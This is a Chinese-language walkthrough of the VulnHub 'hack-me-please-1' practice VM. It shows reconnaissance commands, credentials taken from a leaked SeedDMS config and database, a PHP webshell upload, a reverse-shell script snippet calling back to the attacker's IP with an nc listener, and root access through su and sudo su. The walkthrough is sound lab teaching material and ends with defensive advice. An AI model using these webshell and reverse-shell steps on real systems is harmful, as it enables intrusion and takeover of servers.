VulnHub-hack-me-please-1 靶场渗透
字数 1578 2025-08-13 21:33:25
VulnHub-hack-me-please-1 靶场渗透教学文档
靶场基本信息
- 来源:VulnHub (https://vulnhub.com/entry/hack-me-please-1,731/)
- 发布日期:2021年7月31日
- 难度等级:容易
- 目标:获取root权限
- 运行环境:VirtualBox 6.1(仅主机模式网卡172.16.10.1)
- 特别说明:完全为OSCP考试准备的简单靶场,不需要暴力破解
环境配置
- 攻击机:Kali Linux
- 网络配置:仅主机模式(Host-Only)
- 攻击机IP:172.16.10.102
- 靶机IP:172.16.10.108
渗透测试过程
一、信息收集阶段
-
主机发现
netdiscover -r 172.16.10.0/24 -i eth0 -
端口扫描
nmap -v -T4 -p- -A -oN nmap.log 172.16.10.108- 结果分析:重点关注开放的HTTP服务
-
Web服务枚举
- 初始访问:http://172.16.10.108
- 目录扫描:
dirsearch -u "http://172.16.10.108/" gobuster dir -u http://172.16.10.108/ -w /usr/share/wordlists/dirb/common.txt
-
JS文件分析
- 发现关键线索:/js/main.js
- 找到SeedDMS文档管理系统路径:/seeddms51x/seeddms-5.1.22/
-
配置文件挖掘
- 访问配置文件路径:http://172.16.10.108/seeddms51x/conf/
- 获取数据库凭据:
- 文件路径:/seeddms51x/conf/settings.xml
- 数据库用户名:seeddms
- 数据库密码:seeddms
-
数据库信息提取
- 在seeddms数据库的tblUsers表中发现:
- admin/123456 (MD5加密)
- saket/Saket@#$1337
- 在seeddms数据库的tblUsers表中发现:
二、漏洞利用阶段
-
登录SeedDMS后台
- 登录地址:http://172.16.10.108/seeddms51x/seeddms-5.1.22/out/out.Login.php
- 使用凭证:admin/123456
-
文件上传漏洞利用
- 路径:添加文档功能
- 上传PHP webshell(如冰蝎马)
- 上传后的文件位置:/data/1048576/[document_id]/1.php
- 其中[document_id]为文档ID(本例中为7)
-
获取初始shell
- 使用冰蝎连接webshell
- 或者直接访问:http://172.16.10.108/seeddms51x/seeddms-5.1.22/data/1048576/7/1.php
-
反弹shell
- 使用PHP反弹脚本(ch4nge.php):
set_time_limit (0); $VERSION = "1.0"; $ip = '172.16.10.102'; $port = 8888; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; sh -i'; $daemon = 0; $debug = 0;- 本地监听:
nc -lvnp 8888
-
升级交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
三、权限提升阶段
-
用户切换
- 发现用户saket
- 使用之前获得的凭证:saket/Saket@#$1337
su saket -
提权到root
sudo su- 直接获取root权限
关键知识点总结
-
信息收集技巧
- JS文件分析往往能发现隐藏路径
- 配置文件泄露是常见漏洞点
- 数据库默认凭据需要重点检查
-
SeedDMS漏洞利用
- 版本:5.1.22
- 文件上传位置:添加文档功能
- 上传后的文件路径规律:/data/1048576/[document_id]/1.php
-
权限提升路径
- 通过数据库泄露的用户凭据进行横向移动
- sudo su直接提权(简单靶场特性)
参考资源
- SeedDMS 5.1.22源码:https://sourceforge.net/p/seeddms/code/ci/5.1.22/tree/
- 原始渗透报告:https://nepcodex.com/2021/08/hack-me-please-walkthrough-vulnhub/
- 相关工具和脚本下载:https://pan.baidu.com/s/1TDpCDx82KhY4C5UmrUoHGg 提取码:jiay
防御建议
- 对敏感配置文件设置访问权限
- 避免使用默认数据库凭据
- 对文件上传功能实施严格过滤
- 限制sudo权限分配
- 定期更新文档管理系统